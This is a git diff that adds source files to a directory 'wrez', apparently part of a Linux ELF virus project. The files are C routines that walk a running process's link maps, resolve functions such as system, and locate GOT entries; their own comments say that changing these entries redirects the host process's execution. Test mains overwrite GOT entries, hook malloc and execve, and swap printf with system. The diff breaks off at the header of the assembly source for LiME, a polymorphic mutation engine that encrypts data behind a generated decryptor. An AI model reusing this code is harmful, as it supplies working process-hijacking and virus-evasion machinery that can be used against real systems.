+ * always chained over `pf', but for `s2' the `s2_direct' parameter controls
+ * the desired behavious: when s2_direct is != 0, then s2 is treated as direct
+ * pointer into current address space. when s2_direct is zero, it will be
+ * looked up just as s1 is.
+ *
+ * return 0 if strings are equal, including terminating NUL character
+ * return != 0 if strings differ
+ */
+
+static inline int
+strmatch (peekmemfunc pf, unsigned char *s1,
+        unsigned char *s2, int s2_direct)
+{
+        if (s2_direct == 0) {
+                while (pfc (s1++) == pfc (s2++))
+                        if (pfc (s1) == 0 && pfc (s2) == 0)
+                                return (0);
+        } else {
+                while (pfc (s1++) == *s2++)
+                        if (pfc (s1) == 0 && *s2 == 0)
+                                return (0);
+        }
+
+        return (1);
+}
+
+
+static inline struct link_map *
+locate_link_map (peekmemfunc pf, void *mybase)
+{
+        Elf32_Word *            got = NULL;
+        Elf32_Dyn *             dyn;
+        struct link_map *       lm;
+
+
+        dyn = dynamic_address (pf, mybase);
+        if (dyn == NULL)
+                return (NULL);
+
+        dyn = dynamic_findtype (pf, dyn, DT_PLTGOT);
+        if (dyn == NULL)
+                return (NULL);
+
+        got = (Elf32_Word *) pf (&dyn->d_un.d_ptr);
+
+        /* platform dependant */
+#define GOT_LM_PTR      1
+        lm = (struct link_map *) pf (&got[GOT_LM_PTR]);
+        while (lm != NULL && pf (&lm->l_prev) != 0)
+                lm = (struct link_map *) pf (&lm->l_prev);
+
+        return (lm);
+}
+
+
+static inline Elf32_Dyn *
+dynamic_address (peekmemfunc pf, void *mybase)
+{
+        Elf32_Ehdr *    e = (Elf32_Ehdr *) mybase;
+        int             phw;
+        Elf32_Phdr *    ph;
+
+
+        ph = (Elf32_Phdr *) ((char *) e + pf (&e->e_phoff));
+
+        for (phw = 0 ; phw < (pf (&e->e_phnum) & 0xffff) ; ++phw) {
+                if (pf (&ph[phw].p_type) == PT_DYNAMIC)
+                        return ((Elf32_Dyn *) pf (&ph[phw].p_vaddr));
+        }
+
+        return (NULL);
+}
+
+
+static inline Elf32_Dyn *
+dynamic_findtype (peekmemfunc pf, Elf32_Dyn *dyntab, Elf32_Sword dttype)
+{
+        for ( ; pf (&dyntab->d_tag) != DT_NULL ; ++dyntab) {
+                if (pf (&dyntab->d_tag) == dttype) {
+                        return (dyntab);
+
+                        break;
+                }
+        }
+
+        return (NULL);
+}
+
+
+static inline Elf32_Sym *
+symtab_findfunc (peekmemfunc pf, Elf32_Sym *sym, char *name, char *strtab,
+        Elf32_Word *hash)
+{
+        unsigned long   tidx;   /* table index */
+        Elf32_Word *    chain = &hash[2 + pf (&hash[0])];
+
+
+        for (tidx = pf (&hash[2 + (elf_hash (name) % pf (&hash[0]))]) ;
+                tidx != STN_UNDEF ; tidx = pf (&chain[tidx]))
+        {
+                if (ELF32_ST_TYPE (pfc (&sym[tidx].st_info)) != STT_FUNC)
+                        continue;
+
+                if (strmatch (pf, &strtab[pf (&sym[tidx].st_name)], name, 1) == 0)
+                        return (&sym[tidx]);
+        }
+
+        return (NULL);
+}
+
+
+
+static inline unsigned long
+elf_hash (const char *name)
+{
+        unsigned long   h = 0,
+                        g;
+
+
+        while (*name) {
+                h = (h << 4) + *name++;
+
+                if ((g = h & 0xf0000000))
+                        h ^= g >> 24;
+                h &= ~g;
+        }
+
+        return (h);
+}
+
+
+static int
+symbol_helpstruct (peekmemfunc pf, void *mybase, Elf32_Dyn *dyno,
+        struct sym_helper *shlp)
+{
+        Elf32_Dyn *             dyn;
+
+
+        shlp->dynsymtab = shlp->dynstrtab =
+                (void *) shlp->dynhash = (void *) NULL;
+
+        if (dyno != NULL)
+                dyn = dyno;
+        else
+                dyn = dynamic_address (pf, mybase);
+
+        if (dyn == NULL)
+                return (1);
+
+        shlp->dynsymtab = dynamic_findtype (pf, dyn, DT_SYMTAB);
+        shlp->dynstrtab = dynamic_findtype (pf, dyn, DT_STRTAB);
+        dyn = dynamic_findtype (pf, dyn, DT_HASH);
+        if (dyn != NULL)
+                shlp->dynhash = (Elf32_Word *) (pf (&dyn->d_un.d_ptr));
+
+        if (shlp->dynsymtab == NULL || shlp->dynstrtab == NULL ||
+                shlp->dynhash == NULL)
+        {
+                return (1);
+        }
+
+        return (0);
+}
+
+
+int
+lib_ismapped (peekmemfunc pf, void *mybase, char *str)
+{
+        struct link_map *       lm;
+
+
+        for (lm = locate_link_map (pf, mybase) ; lm != NULL ;
+                lm = (struct link_map *) pf (&lm->l_next)) {
+                if (strstr (pf, (unsigned char *) pf (&lm->l_name), str) == 0)
+                        return (1);
+        }
+        
+        return (0);
+}
+
+
+void *
+symbol_resolve (peekmemfunc pf, void *mybase, char *sym_name)
+{
+        struct sym_helper       shlp;
+        struct link_map *       lm;
+        Elf32_Sym *             psym;
+        Elf32_Dyn *             dwalk;
+
+
+        lm = locate_link_map (pf, mybase);
+        if (lm == NULL)
+                return (NULL);
+
+        /* scan link maps for the symbol
+         */
+        for ( ; pf (&lm->l_next) != 0 ;
+                lm = (struct link_map *) pf (&lm->l_next))
+        {
+                /* compile necessary info for this link map
+                 */
+                for (dwalk = (Elf32_Dyn *) pf (&lm->l_ld) ;
+                        pf (&dwalk->d_tag) != DT_NULL ; ++dwalk)
+                {
+                        switch (pf (&dwalk->d_tag)) {
+                        case (DT_HASH):
+                                shlp.dynhash = (Elf32_Word *)
+                                        (((char *) pf (&dwalk->d_un.d_ptr)) +
+                                        pf (&lm->l_addr));
+                                break;
+                        case (DT_STRTAB):
+                                shlp.dynstrtab = dwalk;
+                                break;
+                        case (DT_SYMTAB):
+                                shlp.dynsymtab = dwalk;
+                                break;
+                        default:
+                                break;
+                        }
+                }
+
+                psym = symtab_findfunc (pf,
+                        (Elf32_Sym *) pf (&shlp.dynsymtab->d_un.d_ptr),
+                        sym_name, (char *) pf (&shlp.dynstrtab->d_un.d_ptr),
+                        shlp.dynhash);
+
+                if (psym != NULL)
+                        return (((char *) pf (&lm->l_addr)) +
+                                pf (&psym->st_value));
+        }
+
+        return (NULL);
+}
+
+
+int
+got_funcloc_array (peekmemfunc pf, void *mybase, char *name,
+        Elf32_Word *darr[], int darr_len, char *substr)
+{
+        int                     darr_cur = 0;
+        struct link_map *       lm;
+
+
+        lm = locate_link_map (pf, mybase);
+
+        while (darr_cur < darr_len) {
+                /* no more link maps to process
+                 */
+                if (lm == NULL)
+                        return (darr_cur);
+
+#ifdef TESTING_DEBUG
+                printf ("%s @ 0x%08x\n", lm->l_name, (unsigned int) lm->l_ld);
+#endif
+                if (substr == NULL || strstr (pf,
+                        (unsigned char *) pf (&lm->l_name), substr) == 0)
+                {
+                        darr[darr_cur] = got_funcloc_dyn (pf,
+                                (Elf32_Dyn *) pf (&lm->l_ld),
+                                (Elf32_Addr) pf (&lm->l_addr), name);
+
+                        if (darr[darr_cur] != NULL)
+                                darr_cur += 1;  /* good god, got a GOT entry */
+                }
+
+                /* next linkmap
+                 */
+                lm = (struct link_map *) pf (&lm->l_next);
+        }
+
+        return (darr_cur);
+}
+
+
+Elf32_Word *
+got_funcloc (peekmemfunc pf, void *mybase, char *name)
+{
+        Elf32_Dyn *     dyn = dynamic_address (pf, mybase);
+
+        return ((Elf32_Word *) got_funcloc_dyn (pf, dyn, 0, name));
+}
+
+
+Elf32_Word *
+got_funcloc_dyn (peekmemfunc pf, Elf32_Dyn *dyno, Elf32_Addr loadbase,
+        char *name)
+{
+        struct sym_helper       shlp;
+        Elf32_Dyn *             pltrel;
+        Elf32_Dyn *             pltrelsz;
+
+        unsigned int            rwk;    /* relocation walker */
+        Elf32_Rel *             relw;
+        Elf32_Sym *             rsym;
+
+
+        if (symbol_helpstruct (pf, NULL, dyno, &shlp))
+                return (NULL);
+        shlp.dynhash = (Elf32_Word *) (((char *) shlp.dynhash) +
+                loadbase);
+
+        pltrel = dynamic_findtype (pf, dyno, DT_JMPREL);
+        pltrelsz = dynamic_findtype (pf, dyno, DT_PLTRELSZ);
+        if (pltrel == NULL || pltrelsz == NULL)
+                return (NULL);
+
+        /* walk all relocation entries for the .plt
+         */
+        relw = (Elf32_Rel *) (pf (&pltrel->d_un.d_ptr));
+        for (rwk = pf (&pltrelsz->d_un.d_val) / sizeof (Elf32_Rel) ;
+                rwk > 0 ; --rwk, relw += 1)
+        {
+                if (ELF32_R_TYPE (pf (&relw->r_info)) != R_386_JMP_SLOT)
+                        continue;
+
+                if (ELF32_R_SYM (pf (&relw->r_info)) == STN_UNDEF)
+                        continue;
+
+                rsym = (Elf32_Sym *) pf (&shlp.dynsymtab->d_un.d_ptr);
+                rsym = &rsym[ELF32_R_SYM (pf (&relw->r_info))];
+
+                if (strmatch (pf, &(((char *)
+                        pf (&shlp.dynstrtab->d_un.d_ptr))[pf (&rsym->st_name)]),
+                        name, 1) == 0)
+                {
+                        /* rsym->st_value:
+                         *   == 0:
+                         *        got = loadbase + relw->r_offset
+                         *   != 0:
+                         *        func_entry = loadbase + rsym->st_value
+                         *        got = loadbase + relw->r_offset
+                         */
+#ifdef TESTING_DEBUG
+                        printf ("rsym: %s\n", &(((char *)
+                                shlp.dynstrtab->d_un.d_ptr)[rsym->st_name]));
+#endif
+                        return ((Elf32_Word *) (loadbase + pf (&relw->r_offset)));
+                }
+
+#ifdef TESTING_DEBUG_VERBOSE
+                printf ("rsym: %s\n", &(((char *)
+                        shlp.dynstrtab->d_un.d_ptr)[rsym->st_name]));
+#endif
+        }
+
+        return (NULL);
+}
+
+
+unsigned int
+pf_copy (void *addr)
+{
+        unsigned int *  uiptr = (unsigned int *) addr;
+
+        return (*uiptr);
+}
+
+
+#ifdef TESTING
+void *
+my_malloc (unsigned int size)
+{
+        fprintf (stderr, "my_malloc (%u)\n", size);
+
+        return (NULL);
+}
+
+
+int
+main (void)
+{
+        int     n,
+                wk;
+
+        void    * my_addr = (void *) 0x08048000;
+        char    * sym_name = "system";
+        int     (*systemf)(char *);
+
+        Elf32_Word *    got_printf;
+        Elf32_Word *    got_system;
+        Elf32_Word *    got_malloc;
+
+        char *          eargv[3] = { "/usr/bin/id", "id", NULL };
+        Elf32_Word *    got_execve;
+        Elf32_Word *    got_arr[16];
+
+
+#if 1
+        printf ("ismapped(\"libpcap\") = %d\n",
+                lib_ismapped (pf_copy, my_addr, "libpcap"));
+        printf ("ismapped(\"libc.so\") = %d\n",
+                lib_ismapped (pf_copy, my_addr, "libc.so"));
+        printf ("ismapped(\"libpam\") = %d\n",
+                lib_ismapped (pf_copy, my_addr, "libpam"));
+#endif
+
+        systemf = symbol_resolve (pf_copy, my_addr, sym_name);
+        if (systemf == NULL)
+                _exit (1);
+
+        (*systemf)("uname -a;id;\n");
+        system("echo real system;\n");
+
+#if 1
+        printf ("hello\n");
+
+        got_printf = got_funcloc (pf_copy, my_addr, "printf");
+        got_system = got_funcloc (pf_copy, my_addr, "system");
+        got_execve = got_funcloc (pf_copy, my_addr, "execve");
+
+        /* get execve GOT table locations
+         */
+        n = got_funcloc_array (pf_copy, my_addr, "myshareddeepfunc",
+                got_arr, 16, "shared-library");
+        printf ("got_funcloc_array (myshareddeepfunc) = %d\n", n);
+        for (wk = 0 ; wk < n ; ++wk)
+                printf ("  got_arr[%d] = 0x%08x [0x%08x]\n", wk,
+                        (unsigned int) got_arr[wk],
+                        *got_arr[wk]);
+
+        got_malloc = got_arr[0];
+        *got_malloc = (Elf32_Word) my_malloc;
+
+        mysharedfunc (1911);
+#endif
+#if 0
+        /* replace execve, then try to call execve and then system
+         */
+        *got_execve = (Elf32_Word) my_execve;
+        execve (eargv[0], eargv, NULL);
+        system ("echo \"execve NOT hooked within system() call\"");
+
+        /* swap printf and system GOT entries, that is fun!
+         */
+        *got_printf ^= *got_system;
+        *got_system ^= *got_printf;
+        *got_printf ^= *got_system;
+
+        printf ("echo printf called, system executed;id;uname -a;\n");
+        system ("system called, printf executed\n");
+#endif
+
+        return (0);
+}
+#endif
+
diff --git a/other/wrez/lookup-pm.h b/other/wrez/lookup-pm.h
new file mode 100644
index 0000000..388b226
--- /dev/null
+++ b/other/wrez/lookup-pm.h
@@ -0,0 +1,85 @@
+
+#ifndef LOOKUP_H
+#define LOOKUP_H
+
+#include <elf.h>
+
+/* generic type definition to be used when the peek-mem feature is required
+ *
+ * on all functions, the `pf' parameter is the function that peeks into the
+ * memory at the given address, returning the 32 bit word at its place
+ */
+typedef unsigned int (* peekmemfunc)(void *);
+
+
+/* lib_ismapped
+ *
+ * walk through the list of all mapped libraries and perform a strstr
+ * substring search on the library name with the string `str' as needle.
+ *
+ * example:  if (lib_ismapped (0x08048000, "libc.so")) {
+ *
+ * return 0 if the library is not mapped
+ * return 1 if the library is mapped
+ */
+
+int
+lib_ismapped (peekmemfunc pf, void *mybase, char *str);
+
+
+/* symbol_resolve
+ *
+ * try to resolve the function symbol with the name `sym_name' within the
+ * current executeable. the base address (first byte of .text, first byte of
+ * first PT_LOAD segment) is needed to locate the tables necessary for the
+ * lookup. it is normally 0x08048000 for a gcc compiled linux binary.
+ *
+ * return pointer to function named `sym_name' on success
+ * return NULL in case of failure (symbol was not found)
+ */
+
+void *
+symbol_resolve (peekmemfunc pf, void *mybase, char *sym_name);
+
+
+/* got_funcloc
+ *
+ * try to locate the function `name's got entry address. the executeable base
+ * must be given through `mybase'. this is where the elf header is supposed to
+ * be. the difference of this function to symbol_resolve is that you can only
+ * find functions used by the host program with this one, while symbol_resolve
+ * will locate any mapped one. also, this function returns a pointer to the
+ * GOT address, not the address itself. by changing the GOT entry you can
+ * redirect the execution of the host process. but be advised, that the code
+ * you are redirecting it to has to be mapped.
+ *
+ * return NULL on failure (function not found, insufficient dynamic info)
+ *     this is often the case, when the host program does not use the function
+ * return pointer to GOT entry on success. [retval] is the address itself.
+ */
+
+Elf32_Word *
+got_funcloc (peekmemfunc pf, void *mybase, char *name);
+
+Elf32_Word *
+got_funcloc_dyn (peekmemfunc pf, Elf32_Dyn *dyno, Elf32_Addr loadbase,
+        char *name);
+
+
+/* got_funcloc_array
+ *
+ * build an array of GOT locations through all available link maps. the base
+ * of the current elf is needed (`mybase'). the name of the function symbol
+ * to be resolved is `name', and the array will be put at `darr', where no
+ * more than `darr_len' entries will be put. if `substr' is non-NULL, only
+ * libraries with a full pathname containing `substr' will be processed.
+ *
+ * return the number (< darr_len) of entires stored, 0 for none
+ */
+
+int
+got_funcloc_array (peekmemfunc pf, void *mybase, char *name,
+        Elf32_Word *darr[], int darr_len, char *substr);
+
+#endif
+
diff --git a/other/wrez/lookup.c b/other/wrez/lookup.c
new file mode 100644
index 0000000..7389525
--- /dev/null
+++ b/other/wrez/lookup.c
@@ -0,0 +1,485 @@
+/* written by some clever unnamed person
+ * lots of fixes and changes by someone else
+ */
+
+
+#include <elf.h>
+#include "lookup.h"
+
+#ifdef TESTING
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include "lookup-example/shared-library.h"
+#else
+#include "common.c"
+#endif
+
+
+struct link_map {
+        Elf32_Addr              l_addr;
+        char *                  l_name;
+        Elf32_Dyn *             l_ld;           /* .dynamic ptr */
+        struct link_map *       l_next;
+        struct link_map *       l_prev;
+};
+
+
+struct sym_helper {
+        Elf32_Dyn *     dynsymtab;      /* DT_SYMTAB symbol table */
+        Elf32_Dyn *     dynstrtab;      /* DT_STRTAB string table */
+        Elf32_Word *    dynhash;        /* DT_HASH hashtable */
+};
+
+
+static int strstr (unsigned char *s1_hay, unsigned char *s2_needle);
+static int strmatch (char *s1, char *s2);
+static struct link_map * locate_link_map (void *mybase);
+static inline unsigned long elf_hash (const char *name);
+
+static Elf32_Dyn * dynamic_address (void *mybase);
+static Elf32_Dyn * dynamic_findtype (Elf32_Dyn *dyntab,
+        Elf32_Sword dttype);
+static int symbol_helpstruct (void *mybase, Elf32_Dyn *dyno,
+        struct sym_helper *shlp);
+
+static Elf32_Sym * symtab_findfunc (Elf32_Sym *symstart, char *name,
+        char *strtab, Elf32_Word *hash);
+
+
+/* naive, but small
+ */
+static int
+strstr (unsigned char *s1_hay, unsigned char *s2_needle)
+{
+        unsigned char * s1wh;
+        unsigned char * s2wn;
+
+        while (*s1_hay != 0) {
+                s1wh = s1_hay++;
+                s2wn = s2_needle;
+
+                while (*s1wh++ == *s2wn++) {
+                        if (*s2wn == 0)
+                                return (0);     /* found */
+                }
+        }
+
+        return (1);     /* not found */
+}
+
+
+static int
+strmatch (char *s1, char *s2)
+{
+        while (*s1++ == *s2++)
+                if (*s1 == 0 && *s2 == 0)
+                        return (0);
+
+        return (1);
+}
+
+
+static struct link_map *
+locate_link_map (void *mybase)
+{
+        Elf32_Word *            got = NULL;
+        Elf32_Dyn *             dyn;
+        struct link_map *       lm;
+
+
+        dyn = dynamic_address (mybase);
+        dyn = dynamic_findtype (dyn, DT_PLTGOT);
+        if (dyn == NULL)
+                return (NULL);
+
+        got = (Elf32_Word *) dyn->d_un.d_ptr;
+
+        /* platform dependant */
+#define GOT_LM_PTR      1
+        lm = (struct link_map *) got[GOT_LM_PTR];
+        while (lm != NULL && lm->l_prev != NULL)
+                lm = lm->l_prev;
+
+        return (lm);
+}
+
+
+static Elf32_Dyn *
+dynamic_address (void *mybase)
+{
+        Elf32_Ehdr *    e = (Elf32_Ehdr *) mybase;
+        int             phw;
+        Elf32_Phdr *    ph;
+
+
+        ph = (Elf32_Phdr *) ((char *) e + e->e_phoff);
+
+        for (phw = 0 ; phw < e->e_phnum ; ++phw) {
+                if (ph[phw].p_type == PT_DYNAMIC)
+                        return ((Elf32_Dyn *) ph[phw].p_vaddr);
+        }
+
+        return (NULL);
+}
+
+
+static Elf32_Dyn *
+dynamic_findtype (Elf32_Dyn *dyntab, Elf32_Sword dttype)
+{
+        for ( ; dyntab->d_tag != DT_NULL ; ++dyntab) {
+                if (dyntab->d_tag == dttype) {
+                        return (dyntab);
+
+                        break;
+                }
+        }
+
+        return (NULL);
+}
+
+
+static Elf32_Sym *
+symtab_findfunc (Elf32_Sym *sym, char *name, char *strtab,
+        Elf32_Word *hash)
+{
+        unsigned long   tidx;   /* table index */
+        Elf32_Word *    chain = &hash[2 + hash[0]];
+
+
+        for (tidx = hash[2 + (elf_hash (name) % hash[0])] ;
+                tidx != STN_UNDEF ; tidx = chain[tidx])
+        {
+                if (ELF32_ST_TYPE (sym[tidx].st_info) != STT_FUNC)
+                        continue;
+
+                if (strmatch (&strtab[sym[tidx].st_name], name) == 0)
+                        return (&sym[tidx]);
+        }
+
+        return (NULL);
+}
+
+
+
+static inline unsigned long
+elf_hash (const char *name)
+{
+        unsigned long   h = 0,
+                        g;
+
+
+        while (*name) {
+                h = (h << 4) + *name++;
+
+                if ((g = h & 0xf0000000))
+                        h ^= g >> 24;
+                h &= ~g;
+        }
+
+        return (h);
+}
+
+
+static int
+symbol_helpstruct (void *mybase, Elf32_Dyn *dyno, struct sym_helper *shlp)
+{
+        Elf32_Dyn *             dyn;
+
+
+        shlp->dynsymtab = shlp->dynstrtab =
+                (void *) shlp->dynhash = (void *) NULL;
+
+        if (dyno != NULL)
+                dyn = dyno;
+        else
+                dyn = dynamic_address (mybase);
+
+        if (dyn == NULL)
+                return (1);
+
+        shlp->dynsymtab = dynamic_findtype (dyn, DT_SYMTAB);
+        shlp->dynstrtab = dynamic_findtype (dyn, DT_STRTAB);
+        dyn = dynamic_findtype (dyn, DT_HASH);
+        if (dyn != NULL)
+                shlp->dynhash = (Elf32_Word *) dyn->d_un.d_ptr;
+
+        if (shlp->dynsymtab == NULL || shlp->dynstrtab == NULL ||
+                shlp->dynhash == NULL)
+        {
+                return (1);
+        }
+
+        return (0);
+}
+
+
+/* public functions
+ */
+
+int
+lib_ismapped (void *mybase, char *str)
+{
+        struct link_map *       lm;
+
+
+        for (lm = locate_link_map (mybase) ; lm != NULL ; lm = lm->l_next) {
+                if (strstr (lm->l_name, str) == 0)
+                        return (1);
+        }
+        
+        return (0);
+}
+
+
+void *
+symbol_resolve (void *mybase, char *sym_name)
+{
+        struct sym_helper       shlp;
+        struct link_map *       lm;
+        Elf32_Sym *             psym;
+        Elf32_Dyn *             dwalk;
+
+
+        lm = locate_link_map (mybase);
+        if (lm == NULL)
+                return (NULL);
+
+        /* scan link maps for the symbol
+         */
+        for ( ; lm->l_next != NULL ; lm = lm->l_next) {
+
+                /* compile necessary info for this link map
+                 */
+                for (dwalk = lm->l_ld ; dwalk->d_tag != DT_NULL ; ++dwalk) {
+                        switch (dwalk->d_tag) {
+                        case (DT_HASH):
+                                shlp.dynhash = (Elf32_Word *)
+                                        (((char *) dwalk->d_un.d_ptr) +
+                                        lm->l_addr);
+                                break;
+                        case (DT_STRTAB):
+                                shlp.dynstrtab = dwalk;
+                                break;
+                        case (DT_SYMTAB):
+                                shlp.dynsymtab = dwalk;
+                                break;
+                        default:
+                                break;
+                        }
+                }
+
+                psym = symtab_findfunc ((Elf32_Sym *) shlp.dynsymtab->d_un.d_ptr,
+                        sym_name, (char *) shlp.dynstrtab->d_un.d_ptr,
+                        shlp.dynhash);
+
+                if (psym != NULL)
+                        return (((char *) lm->l_addr) + psym->st_value);
+        }
+
+        return (NULL);
+}
+
+
+int
+got_funcloc_array (void *mybase, char *name, Elf32_Word *darr[], int darr_len,
+        char *substr)
+{
+        int                     darr_cur = 0;
+        struct link_map *       lm;
+
+
+        lm = locate_link_map (mybase);
+
+        while (darr_cur < darr_len) {
+                /* no more link maps to process
+                 */
+                if (lm == NULL)
+                        return (darr_cur);
+
+#ifdef TESTING_DEBUG
+                printf ("%s @ 0x%08x\n", lm->l_name, (unsigned int) lm->l_ld);
+#endif
+                if (substr == NULL || strstr (lm->l_name, substr) == 0) {
+                        darr[darr_cur] = got_funcloc_dyn (lm->l_ld, lm->l_addr,
+                                name);
+
+                        if (darr[darr_cur] != NULL)
+                                darr_cur += 1;  /* good god, got a GOT entry */
+                }
+
+                /* next linkmap
+                 */
+                lm = lm->l_next;
+        }
+
+        return (darr_cur);
+}
+
+
+Elf32_Word *
+got_funcloc (void *mybase, char *name)
+{
+        Elf32_Dyn *     dyn = dynamic_address (mybase);
+
+        return (got_funcloc_dyn (dyn, 0, name));
+}
+
+
+Elf32_Word *
+got_funcloc_dyn (Elf32_Dyn *dyno, Elf32_Addr loadbase, char *name)
+{
+        struct sym_helper       shlp;
+        Elf32_Dyn *             pltrel;
+        Elf32_Dyn *             pltrelsz;
+
+        unsigned int            rwk;    /* relocation walker */
+        Elf32_Rel *             relw;
+        Elf32_Sym *             rsym;
+
+
+        if (symbol_helpstruct (NULL, dyno, &shlp))
+                return (NULL);
+        shlp.dynhash = (Elf32_Word *) (((char *) shlp.dynhash) +
+                loadbase);
+
+        pltrel = dynamic_findtype (dyno, DT_JMPREL);
+        pltrelsz = dynamic_findtype (dyno, DT_PLTRELSZ);
+        if (pltrel == NULL || pltrelsz == NULL)
+                return (NULL);
+
+        /* walk all relocation entries for the .plt
+         */
+        relw = (Elf32_Rel *) pltrel->d_un.d_ptr;
+        for (rwk = pltrelsz->d_un.d_val / sizeof (Elf32_Rel) ;
+                rwk > 0 ; --rwk, relw += 1)
+        {
+                if (ELF32_R_TYPE (relw->r_info) != R_386_JMP_SLOT)
+                        continue;
+
+                if (ELF32_R_SYM (relw->r_info) == STN_UNDEF)
+                        continue;
+
+                rsym = (Elf32_Sym *) shlp.dynsymtab->d_un.d_ptr;
+                rsym = &rsym[ELF32_R_SYM (relw->r_info)];
+
+                if (strmatch (name,
+                        &(((char *) shlp.dynstrtab->d_un.d_ptr)[rsym->st_name])) == 0)
+                {
+                        /* rsym->st_value:
+                         *   == 0:
+                         *        got = loadbase + relw->r_offset
+                         *   != 0:
+                         *        func_entry = loadbase + rsym->st_value
+                         *        got = loadbase + relw->r_offset
+                         */
+#ifdef TESTING_DEBUG
+                        printf ("rsym: %s\n", &(((char *)
+                                shlp.dynstrtab->d_un.d_ptr)[rsym->st_name]));
+#endif
+                        return ((Elf32_Word *) (loadbase + relw->r_offset));
+                }
+
+#ifdef TESTING_DEBUG_VERBOSE
+                printf ("rsym: %s\n", &(((char *) shlp.dynstrtab->d_un.d_ptr)[rsym->st_name]));
+#endif
+        }
+
+        return (NULL);
+}
+
+
+#ifdef TESTING
+int
+my_execve(const char *filename, char *const argv [], char *const envp[])
+{
+        printf ("execve IS hooked within execve() call\n");
+
+        return (0);
+}
+
+
+void *
+my_malloc (unsigned int size)
+{
+        fprintf (stderr, "my_malloc (%u)\n", size);
+
+        return (NULL);
+}
+
+
+
+int
+main (void)
+{
+        int     n,
+                wk;
+
+        void    * my_addr = (void *) 0x08048000;
+        char    * sym_name = "system";
+        int     (*systemf)(char *);
+
+        Elf32_Word *    got_printf;
+        Elf32_Word *    got_system;
+        Elf32_Word *    got_malloc;
+
+        char *          eargv[3] = { "/usr/bin/id", "id", NULL };
+        Elf32_Word *    got_execve;
+        Elf32_Word *    got_arr[16];
+
+
+        printf ("ismapped(\"libpcap\") = %d\n", lib_ismapped (my_addr,
+                "libpcap"));
+        printf ("ismapped(\"libc.so\") = %d\n", lib_ismapped (my_addr,
+                "libc.so"));
+        printf ("ismapped(\"libpam\") = %d\n", lib_ismapped (my_addr,
+                "libpam"));
+
+        systemf = symbol_resolve (my_addr, sym_name);
+        if (systemf == NULL)
+                _exit (1);
+
+        (*systemf)("uname -a;id;\n");
+        system("echo real system;\n");
+
+        printf ("hello\n");
+
+        got_printf = got_funcloc (my_addr, "printf");
+        got_system = got_funcloc (my_addr, "system");
+        got_execve = got_funcloc (my_addr, "execve");
+
+        /* get execve GOT table locations
+         */
+        n = got_funcloc_array (my_addr, "myshareddeepfunc", got_arr, 16, "shared-library");
+        printf ("got_funcloc_array (myshareddeepfunc) = %d\n", n);
+        for (wk = 0 ; wk < n ; ++wk)
+                printf ("  got_arr[%d] = 0x%08x [0x%08x]\n", wk,
+                        (unsigned int) got_arr[wk],
+                        *got_arr[wk]);
+
+        got_malloc = got_arr[0];
+        *got_malloc = (Elf32_Word) my_malloc;
+
+        mysharedfunc (1911);
+#if 0
+        /* replace execve, then try to call execve and then system
+         */
+        *got_execve = (Elf32_Word) my_execve;
+        execve (eargv[0], eargv, NULL);
+        system ("echo \"execve NOT hooked within system() call\"");
+
+        /* swap printf and system GOT entries, that is fun!
+         */
+        *got_printf ^= *got_system;
+        *got_system ^= *got_printf;
+        *got_printf ^= *got_system;
+
+        printf ("echo printf called, system executed;id;uname -a;\n");
+        system ("system called, printf executed\n");
+#endif
+
+        return (0);
+}
+#endif
+
diff --git a/other/wrez/lookup.h b/other/wrez/lookup.h
new file mode 100644
index 0000000..770f57c
--- /dev/null
+++ b/other/wrez/lookup.h
@@ -0,0 +1,77 @@
+
+#ifndef LOOKUP_H
+#define LOOKUP_H
+
+#include <elf.h>
+
+
+/* lib_ismapped
+ *
+ * walk through the list of all mapped libraries and perform a strstr
+ * substring search on the library name with the string `str' as needle.
+ *
+ * example:  if (lib_ismapped (0x08048000, "libc.so")) {
+ *
+ * return 0 if the library is not mapped
+ * return 1 if the library is mapped
+ */
+
+int
+lib_ismapped (void *mybase, char *str);
+
+
+/* symbol_resolve
+ *
+ * try to resolve the function symbol with the name `sym_name' within the
+ * current executeable. the base address (first byte of .text, first byte of
+ * first PT_LOAD segment) is needed to locate the tables necessary for the
+ * lookup. it is normally 0x08048000 for a gcc compiled linux binary.
+ *
+ * return pointer to function named `sym_name' on success
+ * return NULL in case of failure (symbol was not found)
+ */
+
+void *
+symbol_resolve (void *mybase, char *sym_name);
+
+
+/* got_funcloc
+ *
+ * try to locate the function `name's got entry address. the executeable base
+ * must be given through `mybase'. this is where the elf header is supposed to
+ * be. the difference of this function to symbol_resolve is that you can only
+ * find functions used by the host program with this one, while symbol_resolve
+ * will locate any mapped one. also, this function returns a pointer to the
+ * GOT address, not the address itself. by changing the GOT entry you can
+ * redirect the execution of the host process. but be advised, that the code
+ * you are redirecting it to has to be mapped.
+ *
+ * return NULL on failure (function not found, insufficient dynamic info)
+ *     this is often the case, when the host program does not use the function
+ * return pointer to GOT entry on success. [retval] is the address itself.
+ */
+
+Elf32_Word *
+got_funcloc (void *mybase, char *name);
+
+Elf32_Word *
+got_funcloc_dyn (Elf32_Dyn *dyno, Elf32_Addr loadbase, char *name);
+
+
+/* got_funcloc_array
+ *
+ * build an array of GOT locations through all available link maps. the base
+ * of the current elf is needed (`mybase'). the name of the function symbol
+ * to be resolved is `name', and the array will be put at `darr', where no
+ * more than `darr_len' entries will be put. if `substr' is non-NULL, only
+ * libraries with a full pathname containing `substr' will be processed.
+ *
+ * return the number (< darr_len) of entires stored, 0 for none
+ */
+
+int
+got_funcloc_array (void *mybase, char *name, Elf32_Word *darr[], int darr_len,
+        char *substr);
+
+#endif
+
diff --git a/other/wrez/lookup.o b/other/wrez/lookup.o
new file mode 100644
index 0000000..e421caf
--- /dev/null
+++ b/other/wrez/lookup.o
diff --git a/other/wrez/obsolete/lime.original.s b/other/wrez/obsolete/lime.original.s
new file mode 100644
index 0000000..12f663a
--- /dev/null
+++ b/other/wrez/obsolete/lime.original.s
@@ -0,0 +1,1332 @@
+

+; ***************************************************************

+;  To compile [LiME] under Linux with NASM... Follow as:

+;  nasm -f elf lime-gen.s

+;  ld -e main lime-gen.o -o lime-gen

+; ***************************************************************

+

+section .data

+global main

+

+; ***************************************************************

+;  Linux Mutation Engine (source code)

+;  [LiME] Version: 0.2.0                 Last update: 2001/02/28

+;  Written by zhugejin at Taipei, Taiwan.       Date: 2000/10/10

+;  E-mail: zhugejin.bbs@bbs.csie.nctu.edu.tw

+;  WWW: http://cvex.fsn.net

+; ***************************************************************

+

+; Input:

+;       EBX = pointer to memory buffer where LiME will store decryptor

+;             and encrypted data

+;       ECX = pointer to the data, u want to encrypt

+;       EDX = size of data, u want to encrypt

+;       EBP = delta offset

+;

+; Output:

+;       ECX = address of decryptor+encrypted data

